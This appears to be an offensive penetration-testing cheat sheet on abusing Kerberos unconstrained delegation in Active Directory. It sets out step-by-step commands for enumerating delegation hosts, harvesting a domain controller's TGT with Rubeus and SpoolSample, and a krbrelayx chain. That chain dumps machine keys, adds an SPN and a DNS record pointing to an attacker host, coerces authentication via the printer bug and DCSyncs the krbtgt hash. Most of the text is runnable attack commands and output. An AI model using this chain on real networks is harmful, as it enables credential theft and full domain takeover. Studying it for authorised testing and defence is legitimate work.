
# Unconstrained

* <https://adsecurity.org/?p=1667>
* <https://ardent101.github.io/posts/kerberos_delegation/>

Enumerate computers with unconstrained delegation (`TRUSTED_FOR_DELEGATION` in `userAccountControl`). Domain controllers are trusted for delegation by default and show up too; the pivot you want is a non-DC host you can own:

```
PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol
```
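The same query as a raw LDAP filter, plus the bitmask logic behind it, as an added example that is not PowerView code: `userAccountControl` is a bit field, so the filter uses the `LDAP_MATCHING_RULE_BIT_AND` OID, and DCs (`SERVER_TRUST_ACCOUNT`) are excluded because they are trusted for delegation by default. The `SAMPLE` entries are constructed, in the shape of what PowerView or an LDAP client would return.

```python
"""Pick unconstrained-delegation pivots out of AD accounts by userAccountControl bits.
Added example, not PowerView code; SAMPLE entries below are constructed."""

# userAccountControl bits (MS-SAMR / MS-ADTS)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000                # domain controller
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained + protocol transition, not this page

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def bit_and(flag: int) -> str:
    """LDAP extensible match: true when all bits of `flag` are set in userAccountControl."""
    return f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={flag})"


def unconstrained_filter(include_dcs: bool = False) -> str:
    """LDAP equivalent of `Get-DomainComputer -Unconstrained`, minus DCs by default."""
    if include_dcs:
        return bit_and(TRUSTED_FOR_DELEGATION)
    return f"(&{bit_and(TRUSTED_FOR_DELEGATION)}(!{bit_and(SERVER_TRUST_ACCOUNT)}))"


def classify(uac: int):
    """What kind of unconstrained-delegation principal this UAC value describes, or None."""
    if not uac & TRUSTED_FOR_DELEGATION:
        return None
    if uac & ACCOUNTDISABLE:
        return "disabled"
    if uac & SERVER_TRUST_ACCOUNT:
        return "dc"          # unconstrained by default; owning one is already game over
    if uac & WORKSTATION_TRUST_ACCOUNT:
        return "computer"    # the classic pivot (SRV01 in the walkthrough)
    return "user"            # service account / gMSA case from "Other scenarios"


def find_pivots(entries):
    """Entries usable for the attack: unconstrained, enabled, and not a DC."""
    return [(e["sAMAccountName"], classify(e["userAccountControl"]))
            for e in entries
            if classify(e["userAccountControl"]) in ("computer", "user")]


# Constructed sample in the shape of an LDAP / PowerView result set
SAMPLE = [
    {"sAMAccountName": "DC01$",      "dNSHostName": "dc01.megacorp.local",  "userAccountControl": 532480},  # 0x82000
    {"sAMAccountName": "SRV01$",     "dNSHostName": "srv01.megacorp.local", "userAccountControl": 528384},  # 0x81000
    {"sAMAccountName": "WS01$",      "dNSHostName": "ws01.megacorp.local",  "userAccountControl": 4096},    # 0x1000
    {"sAMAccountName": "svc_backup", "dNSHostName": None,                   "userAccountControl": 524800},  # 0x80200
    {"sAMAccountName": "OLD01$",     "dNSHostName": "old01.megacorp.local", "userAccountControl": 528386},  # 0x81002, disabled
]

if __name__ == "__main__":
    print(unconstrained_filter())
    for sam, kind in find_pivots(SAMPLE):
        print(f"{sam:12} {kind}")
```

Feed `unconstrained_filter()` to any LDAP client (ldapsearch, ldap3, windapsearch `--full`-style custom filters) when PowerView is not an option; `classify()` is what tells you whether a hit is a computer pivot, a service account, or a DC you should skip.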

## Monitor for TGTs

Coerce authentication from a DC (DC01) to the owned unconstrained delegation host (SRV01) while Rubeus, running elevated on SRV01, monitors LSASS for new TGTs in the background. Because SRV01 is trusted for unconstrained delegation, DC01$'s forwardable TGT arrives inside the AP-REQ and is cached on SRV01, where Rubeus picks it up. `SpoolSample.exe` takes the target first and the capture host second:

```
Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local
```

Rubeus prints the harvested ticket as a base64 blob (one line with `/nowrap`); decode it into a `.kirbi` file first (e.g. with `base64 -d`), then use [ticket\_converter](https://github.com/eloypgz/ticket_converter) or [ticketConverter.py](https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py) (same argument order) to convert the TGT from `.kirbi` to `.ccache` so impacket can use it:

```
$ python ticket_converter.py dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...
```

If `/registry` was given, Rubeus writes the harvested tickets under that key (one subkey per `<user>@<REALM>`) instead of printing them; read them out with PowerShell and remove the key when done:

```
PS > Get-ChildItem HKLM:\SOFTWARE\MONITOR\
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\DC01$@MEGACORP.LOCAL
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force
```

## "Relaying" Kerberos

* <https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/>
* <https://snovvcrash.github.io/2021/05/21/calculating-kerberos-keys.html>

### Printer Bug + DCSync

Requirements:

* Owned computer account with unconstrained delegation enabled (SRV01).
* Printer bug on a domain controller (DC01).
* Permissions to add an SPN for the owned computer account and a new DNS record in AD. By default a computer account can write its own `msDS-AdditionalDnsHostName` (validated write to DNS host name attributes), and any authenticated user can create records in an AD-integrated DNS zone, so the owned machine account alone is usually enough.

1\. Grab the owned computer account's password so its Kerberos AES key can be calculated. Remote `secretsdump.py` (run with local admin rights on SRV01) prints the `aes256-cts-hmac-sha1-96` key directly; a local hive dump gives the raw UTF-16LE password as hex, which `krbrelayx.py` turns into the key itself later (step 5) when given the hex and the salt:

```
# Remotely
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
...
MEGACORP\SRV01$:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL
...
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<PLAIN_PASSWORD_HEX>
```

2\. Add a custom SPN for the owned computer account with unconstrained delegation:

```
# Check (no modifications)
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local

# Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local

# But modifying msDS-AdditionalDnsHostName will succeed (the account has validated write to it, and the DC registers the matching HOST/ SPN itself)
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
```

3\. Add a DNS record pointing to the attacker's host:

```
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
```

4\. Check that the record resolves against the DC (the DNS server picks up new AD-integrated records within about 3 minutes; the answer should be the attacker's IP):

```
$ nslookup evil.megacorp.local <DC01_IP>
Server:		192.168.1.11
Address:	192.168.1.11#53

Name:	evil.megacorp.local
Address: 10.10.13.37
```

5\. Start `krbrelayx.py` with the AES key of the owned computer account, or with its password in hex plus the salt (`<REALM>host<hostname>.<domain>`: uppercase realm, lowercase host and domain). The key is required because DC01's service ticket for SRV01 is encrypted to SRV01$'s long-term key; krbrelayx decrypts the ticket, recovers the session key, and extracts the forwarded TGT (KRB-CRED) from the authenticator:

```
# In case secretsdump.py was used remotely
$ sudo python krbrelayx.py -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# In case secretsdump.py was used locally
$ sudo python krbrelayx.py --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
```

6\. Coerce the authentication to attacker's host from DC01 by triggering printer bug:

```
$ python printerbug.py megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
```

7\. Point `KRB5CCNAME` at the ccache krbrelayx wrote (named `<client>_<service>.ccache`) and DCSync to get the krbtgt hash (or any other privileged account's hash):

```
$ export KRB5CCNAME=`pwd`/'DC01$@MEGACORP.LOCAL_krbtgt@MEGACORP.LOCAL.ccache'
$ secretsdump.py DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
```

8\. Cleanup. Delete SPN and DNS record:

```
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local

# Check if the SPN was deleted successfully
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
```

Other scenarios:

* In [this](https://exploit.ph/user-constrained-delegation.html) blogpost it is described how to perform the attack by abusing a **service** (user) account with unconstrained delegation enabled.
* In [this](https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-is-useful-sometimes/) blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.
* In [this](https://nothingspecialforu.github.io/UCgMSAExploitation/) blogpost it is described how to perform the attack by abusing a **gMSA** (user) account with unconstrained delegation enabled.

